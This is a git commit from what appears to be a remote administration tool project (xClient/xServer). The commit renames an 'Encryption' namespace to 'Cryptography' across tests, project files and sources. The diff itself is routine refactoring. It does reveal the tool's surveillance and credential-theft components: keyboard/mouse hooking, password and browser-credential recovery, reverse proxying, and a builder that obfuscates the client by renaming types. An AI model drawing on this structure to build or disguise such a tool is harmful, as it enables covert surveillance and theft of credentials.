Moved namespace

This commit is contained in:
MaxXor 2015-09-01 15:16:27 +02:00
parent 1e8506470f
commit 47d5081a4e
16 changed files with 18 additions and 19 deletions

View File

@ -1,6 +1,6 @@
using System.Text;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using xClient.Core.Encryption;
using xClient.Core.Cryptography;
using xClient.Core.Helper;
namespace xClient.Tests.Core.Encryption

View File

@ -1,5 +1,5 @@
using Microsoft.VisualStudio.TestTools.UnitTesting;
using xClient.Core.Encryption;
using xClient.Core.Cryptography;
using xClient.Core.Helper;
namespace xClient.Tests.Core.Encryption

View File

@ -88,8 +88,8 @@
<Compile Include="Core\Commands\SurveillanceHandler.cs" />
<Compile Include="Core\Commands\SystemHandler.cs" />
<Compile Include="Core\Compression\SafeQuickLZ.cs" />
<Compile Include="Core\Encryption\AES.cs" />
<Compile Include="Core\Encryption\SHA256.cs" />
<Compile Include="Core\Cryptography\AES.cs" />
<Compile Include="Core\Cryptography\SHA256.cs" />
<Compile Include="Core\Extensions\RegistryKeyExtensions.cs" />
<Compile Include="Core\Packets\ClientPackets\GetPasswordsResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\SetStatusFileManager.cs" />

View File

@ -3,7 +3,7 @@ using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace xClient.Core.Encryption
namespace xClient.Core.Cryptography
{
public static class AES
{

View File

@ -1,7 +1,7 @@
using System.Security.Cryptography;
using System.Text;
namespace xClient.Core.Encryption
namespace xClient.Core.Cryptography
{
public static class SHA256
{

View File

@ -2,7 +2,7 @@
using System.Management;
using System.Net.NetworkInformation;
using System.Net.Sockets;
using xClient.Core.Encryption;
using xClient.Core.Cryptography;
namespace xClient.Core.Helper
{

View File

@ -5,7 +5,7 @@ using System.Linq;
using System.Net.Sockets;
using System.Threading;
using xClient.Core.Compression;
using xClient.Core.Encryption;
using xClient.Core.Cryptography;
using xClient.Core.Extensions;
using xClient.Core.NetSerializer;
using xClient.Core.Packets;

View File

@ -5,8 +5,8 @@ using System.Threading;
using System.Windows.Forms;
using xClient.Config;
using xClient.Core.Commands;
using xClient.Core.Cryptography;
using xClient.Core.Data;
using xClient.Core.Encryption;
using xClient.Core.Helper;
using xClient.Core.Installation;
using xClient.Core.Networking;

View File

@ -1,6 +1,6 @@
using System.Text;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using xServer.Core.Encryption;
using xServer.Core.Cryptography;
using xServer.Core.Helper;
namespace xServer.Tests.Core.Encryption

View File

@ -3,7 +3,7 @@ using System.IO;
using Mono.Cecil;
using Mono.Cecil.Cil;
using Vestris.ResourceLib;
using xServer.Core.Encryption;
using xServer.Core.Cryptography;
using xServer.Core.Helper;
namespace xServer.Core.Build

View File

@ -56,14 +56,13 @@ namespace xServer.Core.Build
private void RenameInType(TypeDefinition typeDef)
{
if (typeDef.Namespace.StartsWith("xClient.Core.Elevation")
|| typeDef.Namespace.StartsWith("xClient.Core.Compression")
if (typeDef.Namespace.StartsWith("xClient.Core.Compression")
|| typeDef.Namespace.StartsWith("xClient.Core.Networking")
|| typeDef.Namespace.StartsWith("xClient.Core.NetSerializer")
|| typeDef.Namespace.StartsWith("xClient.Core.ReverseProxy")
|| typeDef.Namespace.StartsWith("xClient.Core.MouseKeyHook")
|| typeDef.Namespace.StartsWith("xClient.Core.Packets")
|| typeDef.Namespace.StartsWith("xClient.Core.Recovery.Browsers")
|| typeDef.Namespace.StartsWith("xClient.Core.Recovery")
|| typeDef.HasInterfaces)
return;

View File

@ -3,7 +3,7 @@ using System.IO;
using System.Security.Cryptography;
using System.Text;
namespace xServer.Core.Encryption
namespace xServer.Core.Cryptography
{
public static class AES
{

View File

@ -5,7 +5,7 @@ using System.Net;
using System.Net.Sockets;
using System.Threading;
using xServer.Core.Compression;
using xServer.Core.Encryption;
using xServer.Core.Cryptography;
using xServer.Core.Extensions;
using xServer.Core.NetSerializer;
using xServer.Core.Packets;

View File

@ -5,8 +5,8 @@ using System.Linq;
using System.Threading;
using System.Windows.Forms;
using xServer.Core.Commands;
using xServer.Core.Cryptography;
using xServer.Core.Data;
using xServer.Core.Encryption;
using xServer.Enums;
using xServer.Core.Helper;
using xServer.Core.Networking;

View File

@ -1,8 +1,8 @@
using System;
using System.Globalization;
using System.Windows.Forms;
using xServer.Core.Cryptography;
using xServer.Core.Data;
using xServer.Core.Encryption;
using xServer.Core.Networking;
using xServer.Core.Networking.Utilities;
using xServer.Core.Utilities;

View File

@ -158,7 +158,7 @@
<Compile Include="Core\Commands\SurveillanceHandler.cs" />
<Compile Include="Core\Commands\SystemHandler.cs" />
<Compile Include="Core\Compression\SafeQuickLZ.cs" />
<Compile Include="Core\Encryption\AES.cs" />
<Compile Include="Core\Cryptography\AES.cs" />
<Compile Include="Core\Utilities\FileSplit.cs" />
<Compile Include="Core\Utilities\UnsafeStreamCodec.cs" />
<Compile Include="Core\Networking\Utilities\UPnP.cs" />